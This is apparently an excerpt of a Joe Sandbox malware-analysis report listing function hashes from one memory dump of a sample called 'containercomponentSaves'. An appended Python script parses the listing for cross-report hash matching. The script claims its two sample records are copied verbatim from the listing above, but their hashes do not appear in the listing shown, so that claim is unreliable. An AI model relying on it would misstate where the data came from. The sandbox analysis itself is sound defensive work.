              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66960bfa37217f09acdb43ed817af8c38c1477f75851627160a57872c162ed06
              • Instruction ID: 6d4ed0132c9b63834c0125cc749306c271f1cc28b4a0cebb55fe4cff8b15f05d
              • Opcode Fuzzy Hash: 66960bfa37217f09acdb43ed817af8c38c1477f75851627160a57872c162ed06
              • Instruction Fuzzy Hash: B0018430A2E65E5FE761EBB4C8695A97FE0FF59300F0645BAD408C70A6EF34E6848700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fbdd748e6fec3f10a51271d4bf6a2490b81438b98e301e39ba199b07a69a809
              • Instruction ID: be8e1d656fc71314d42d43ec912ba507d195983ee9c9745c7333f2b97c8dd94b
              • Opcode Fuzzy Hash: 7fbdd748e6fec3f10a51271d4bf6a2490b81438b98e301e39ba199b07a69a809
              • Instruction Fuzzy Hash: 7701C47091A78D5FDB55AB64C4691B93BB0FF15300F1608FFD40ACA0F2DA25A640C701
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 35860555e9e40082f27733ba1b3aa697fd31faece923ed296530184748807ce4
              • Instruction ID: d9914115372b74d21a0887015de0fd6288594b7e4833d48a8f785b82fcf221fe
              • Opcode Fuzzy Hash: 35860555e9e40082f27733ba1b3aa697fd31faece923ed296530184748807ce4
              • Instruction Fuzzy Hash: 11116130E14A1E9FEB94EF68C4546BE77E1FF58305F10497AE419C21A9DB34A2948780
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee871369beb968d3e4c91ca73fb8de1f30a68a9b01e4a43c30a26dcfc7250366
              • Instruction ID: 87366d77ba611b05f327122eed2842846c35b0c16ff8ef849921698f2d08095f
              • Opcode Fuzzy Hash: ee871369beb968d3e4c91ca73fb8de1f30a68a9b01e4a43c30a26dcfc7250366
              • Instruction Fuzzy Hash: 43015E30A2550E9FEB58EFA8C8696BE77F0FF18304F11087AE46EC21A4DE306650C700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 343726c48a69b47ab4d6470c40f8d3d09a5cd04fd82cfea7f677fb02ac256385
              • Instruction ID: 4c1b08272cf91dc80f203dc65442a31babd7244fd31ad4ee4444552c1b953e3c
              • Opcode Fuzzy Hash: 343726c48a69b47ab4d6470c40f8d3d09a5cd04fd82cfea7f677fb02ac256385
              • Instruction Fuzzy Hash: 3A014030A2550E9BDB54EF64C4686BE7BB0FF18304F11147AD46AD21A0DF346650C600
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d76e35584b2441788fd314b7862d5333fa0febdeb9c797ff48f904cb78de07e8
              • Instruction ID: 79f1442b7fa83ed2367dde7acc166e080f820c96fb197da271db08c19a3d463c
              • Opcode Fuzzy Hash: d76e35584b2441788fd314b7862d5333fa0febdeb9c797ff48f904cb78de07e8
              • Instruction Fuzzy Hash: 9501A730A2A54E9FE761EBA4C4695B97BF0FF19300F4645B6D458C60A5DE34E644C700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfdca579e3c96fec6fbe4aa347d9461e2fbe613e4fcb66b62e13cdd9040bbd8b
              • Instruction ID: 9612aa79f19c1c064c8f8efcbd92f1958ffc3170cbfb5987a4468c55deabe627
              • Opcode Fuzzy Hash: bfdca579e3c96fec6fbe4aa347d9461e2fbe613e4fcb66b62e13cdd9040bbd8b
              • Instruction Fuzzy Hash: 05017130A1950E9FDB58EF64C4656BA37A1FF58305F52047EE45ED21A4CA35A350C740
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b3aed13ee035a49d802e4ee2ddb8510bd3e23acefb37c6cc9c3cf88ac2839aeb
              • Instruction ID: fd4e4bbeba7bb72368d013d6cfbb2a495ecfdaa106c5bdcb4ff2dbf3aa82444f
              • Opcode Fuzzy Hash: b3aed13ee035a49d802e4ee2ddb8510bd3e23acefb37c6cc9c3cf88ac2839aeb
              • Instruction Fuzzy Hash: CD018430A2A64E9FD752A7B488695A97BE0EF09300F1609B7D418CB0B6DA38A654C701
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcde475e63685f839a6e4080256c320173f404ff0ac9623d3ba5e8034e997792
              • Instruction ID: aa290b779252ed679099123227f95a45384748421e39375d3f12d33b103b9537
              • Opcode Fuzzy Hash: dcde475e63685f839a6e4080256c320173f404ff0ac9623d3ba5e8034e997792
              • Instruction Fuzzy Hash: 2B01A230A1991E9FDBA8EF64C0646BE77E1FF58308F21047ED40EC21A0CA31A790CB40
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 788598d883a30b37cd6067fe3a34621dafe31b2d0f385a6a60c2dffc1ff996b8
              • Instruction ID: 6ec03443e22a406de1f05b827f3cf002237055273b5293442f8adf148ea7382b
              • Opcode Fuzzy Hash: 788598d883a30b37cd6067fe3a34621dafe31b2d0f385a6a60c2dffc1ff996b8
              • Instruction Fuzzy Hash: 6101B530A5E64E5FD761EB7484E91A97BE0EF16301F0608F6D059C70B6DE24B6448701
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ec6408b9f9cb025834dc1e81bbfc5e9a75eae6420ee2cc0543531a2d8f78b62
              • Instruction ID: 1009cfd21f492e62558513ffe51e555feccbe38207a5eba07874b87331f56679
              • Opcode Fuzzy Hash: 8ec6408b9f9cb025834dc1e81bbfc5e9a75eae6420ee2cc0543531a2d8f78b62
              • Instruction Fuzzy Hash: 0A01F430A0A65E9FEBA9DF24C8656FA3BB0FF55304F5100BAE80DC21A1CB35D690C740
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62f8cf4afcbc5b40be4da3d61eded65f7b5ab267b3bafc56d9dc79b8177de89a
              • Instruction ID: 4f9952e3f10462465015bfff2cecdbd571b4b3479f2c7031c92d15c21b1e51ee
              • Opcode Fuzzy Hash: 62f8cf4afcbc5b40be4da3d61eded65f7b5ab267b3bafc56d9dc79b8177de89a
              • Instruction Fuzzy Hash: 48F08131A2A68F9FEB94EF6488292FE7FB0FF19300F41157AE859C21A1DB7497508741
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b0eb788c8803cd3ad10fecd99b8bbe7c0344d3ab6ed60d1c8fb3c6a0f0f90ee6
              • Instruction ID: 456e483cf70b0e72bc0ebbd563f5f8f89dd2b615a90e6ff9fdb6a11f22a588c3
              • Opcode Fuzzy Hash: b0eb788c8803cd3ad10fecd99b8bbe7c0344d3ab6ed60d1c8fb3c6a0f0f90ee6
              • Instruction Fuzzy Hash: AD018B30A2550E9EDB59EFA4C4695B973A1FF18305F11087DD41ED21F5DE367250CA01
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a956ea51ed3f396b8d4cf6d509edc780632440854b719c88c6d79bc88733444
              • Instruction ID: b83d710ddfc0b90211c9dec35bcf95dc946fc0562d1aa1c2cd3c351131dac446
              • Opcode Fuzzy Hash: 7a956ea51ed3f396b8d4cf6d509edc780632440854b719c88c6d79bc88733444
              • Instruction Fuzzy Hash: A9018130A2950E9FEB59EFA4C4686BA73A0FF18305F11087EE41EC21E5DF35A650C600
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a90272c8e4f160ac9b3c9cce9e161b1707a6a85d33dba869d20e38992f33a99e
              • Instruction ID: 20f6c909d662c8135e8c1201fb52f9d5be299830f92e56f01f8affa35418a241
              • Opcode Fuzzy Hash: a90272c8e4f160ac9b3c9cce9e161b1707a6a85d33dba869d20e38992f33a99e
              • Instruction Fuzzy Hash: 5A018130A1E78E9FDBA5DF64C8651A93BB0FF16300F5601BAE449C61A2DA389654C781
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e5d18eed1d202ea14226e9b1f7ff63803bfb1a91d59ffc22351826c597c6609c
              • Instruction ID: 3acd11884363e268c9070bb5d4294979264b80c458361cc6bf8b4566640d3abe
              • Opcode Fuzzy Hash: e5d18eed1d202ea14226e9b1f7ff63803bfb1a91d59ffc22351826c597c6609c
              • Instruction Fuzzy Hash: F5F0A470E2A62E9DFBA49BA898647BA77E4EF95318F00417AF41AC20E1DF341754C640
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b9e8964a3ce887bbcc632b35f34f695d513b6d15a46ad5c87808c22b781bdf0
              • Instruction ID: c6a87a1e51977e6efc412819964ae64bbdddfac3952d64a250658b40f8cfdffb
              • Opcode Fuzzy Hash: 0b9e8964a3ce887bbcc632b35f34f695d513b6d15a46ad5c87808c22b781bdf0
              • Instruction Fuzzy Hash: FFF09C3051E38D4FDB599F7484651A93B70FF06304F4505BAD419C60E2DB39A654CB41
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26877fb3d57b271a2d75e52b18f8d4f1f775c2853e907c0081ddc002167df400
              • Instruction ID: 5349f3f65b80cf23eaf4f679b9e3112130c61b74d112090fc8e3610be72cc2c5
              • Opcode Fuzzy Hash: 26877fb3d57b271a2d75e52b18f8d4f1f775c2853e907c0081ddc002167df400
              • Instruction Fuzzy Hash: 43F0B431A1E78E8FEB699FA488251F93BA0FF15300F4504BEE409C61E6EF399654C741
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab88b4e2b9a93bafa7822f6d474f69dd6dc04d3368227e2be2eac527a29809eb
              • Instruction ID: 541a8f8efcbf2a7030261c5cc77d73b879a3bcd0193c70ca50755b3cd417e196
              • Opcode Fuzzy Hash: ab88b4e2b9a93bafa7822f6d474f69dd6dc04d3368227e2be2eac527a29809eb
              • Instruction Fuzzy Hash: 00E0B630E2960E8AEB64EB54C8A5BAE7B71BF54304F5141B9D40DA719ADE346E808F90
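To pivot on these entries (for example, to look for the same function hashes in a second report of a related sample, or to confirm that every function listed here comes from the one dump region the report marks "based on PE: false"), the script below parses this plain-text layout into one record per function and runs the field checks a reviewer would want. It is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. The embedded sample is two records copied verbatim from the listing above; the "other listing" is constructed from one of them to stand in for a second report; and the checks (Opcode ID equal to Opcode Fuzzy Hash, 64-hex-digit IDs, hex-only fuzzy hashes, a single dump source) encode what this listing shows, not any documented specification of the format.

```python
import re
from collections import Counter

# Constructed sample: two function records copied from the listing on this page.
# The bullet/field layout is the plain-text rendering of the Joe Sandbox report.
RECORD_A = """\
Memory Dump Source
• Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de8f35e5d51839bfa378a1d16be03ab29c56be448fe8abf53f29dc8b59d0c7fd
• Instruction ID: eaf36449e7eb635433c83cbe0d669542f4aaea6e12c310582fa8a8031093e40e
• Opcode Fuzzy Hash: de8f35e5d51839bfa378a1d16be03ab29c56be448fe8abf53f29dc8b59d0c7fd
• Instruction Fuzzy Hash: D381E131B2DA594FDB58DE5C88A15A977E2FFD8304B15057EE45EC32A2DE30AE02C781
"""
RECORD_B = """\
Memory Dump Source
• Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 85a0466b97c5331fd9a180275150449143034b7ee43ba8fd89a8ba510cac17d6
• Instruction ID: 2d246d899fbf034f2d8f76a834db5aace6ae1c6bab2c31e1d7a2541205fd3d69
• Opcode Fuzzy Hash: 85a0466b97c5331fd9a180275150449143034b7ee43ba8fd89a8ba510cac17d6
• Instruction Fuzzy Hash: 2A51FE31B18A994FDB5CDE5888A45AA77E2FFD8304B15417EE45EC3292CE30EE428781
"""
SAMPLE_LISTING = RECORD_A + RECORD_B
OTHER_LISTING = RECORD_B  # constructed stand-in for a second report sharing one function

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")      # "• Name: value" (value may be empty)
HEX64 = re.compile(r"^[0-9a-f]{64}$", re.I)        # Opcode ID / Instruction ID as seen on the page
HEX = re.compile(r"^[0-9a-f]+$", re.I)             # fuzzy hash length is not asserted

def parse_listing(text):
    """Return one dict per function, keyed by the field names used in the report.
    The 'Source File' line is split into 'Source File', 'Offset' and 'based on PE'.
    A listing that starts mid-record (as this page section does) is handled."""
    entries, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "Memory Dump Source":            # start of the next record
            if cur and cur.get("Instruction ID"):
                entries.append(cur)
            cur = {}
            continue
        m = FIELD.match(line)
        if not m:                                   # "Joe Sandbox IDA Plugin", "Similarity", blanks
            continue
        if cur is None:
            cur = {}
        name, value = m.group(1).strip(), m.group(2).strip()
        if name == "Source File":
            parts = [p.strip() for p in value.split(",")]
            cur["Source File"] = parts[0]
            for p in parts[1:]:                     # "Offset: ...", "based on PE: false"
                k, _, v = p.partition(":")
                cur[k.strip()] = v.strip()
        else:
            cur[name] = value
    if cur and cur.get("Instruction ID"):
        entries.append(cur)
    return entries

def consistency_issues(entries):
    """Checks worth running before pivoting on these values across reports."""
    issues = []
    sources = {(e.get("Source File"), e.get("based on PE")) for e in entries}
    if len(sources) > 1:
        issues.append(f"functions come from {len(sources)} different dump sources")
    for i, e in enumerate(entries):
        if e.get("Opcode ID") != e.get("Opcode Fuzzy Hash"):
            issues.append(f"#{i}: Opcode ID differs from Opcode Fuzzy Hash")
        for key in ("Opcode ID", "Instruction ID"):
            if not HEX64.match(e.get(key, "")):
                issues.append(f"#{i}: {key} is not a 64-hex-digit value")
        if not HEX.match(e.get("Instruction Fuzzy Hash", "")):
            issues.append(f"#{i}: Instruction Fuzzy Hash is not hex")
    return issues

def duplicate_instruction_ids(entries):
    """Instruction IDs that occur more than once (identical functions listed twice)."""
    counts = Counter(e["Instruction ID"] for e in entries)
    return {h: n for h, n in counts.items() if n > 1}

def shared_instruction_ids(listing_a, listing_b):
    """Exact-match pivot: functions present in both listings."""
    return {e["Instruction ID"] for e in listing_a} & {e["Instruction ID"] for e in listing_b}

if __name__ == "__main__":
    funcs = parse_listing(SAMPLE_LISTING)
    print(f"{len(funcs)} functions parsed; issues: {consistency_issues(funcs) or 'none'}")
    print("shared with other listing:", shared_instruction_ids(funcs, parse_listing(OTHER_LISTING)))
```

Run it against the full text of this section (saved to a file) to get every function's hashes in one structure; the exact-match pivot on Instruction ID is deliberately conservative, since the page gives no specification of how the fuzzy hashes are meant to be compared.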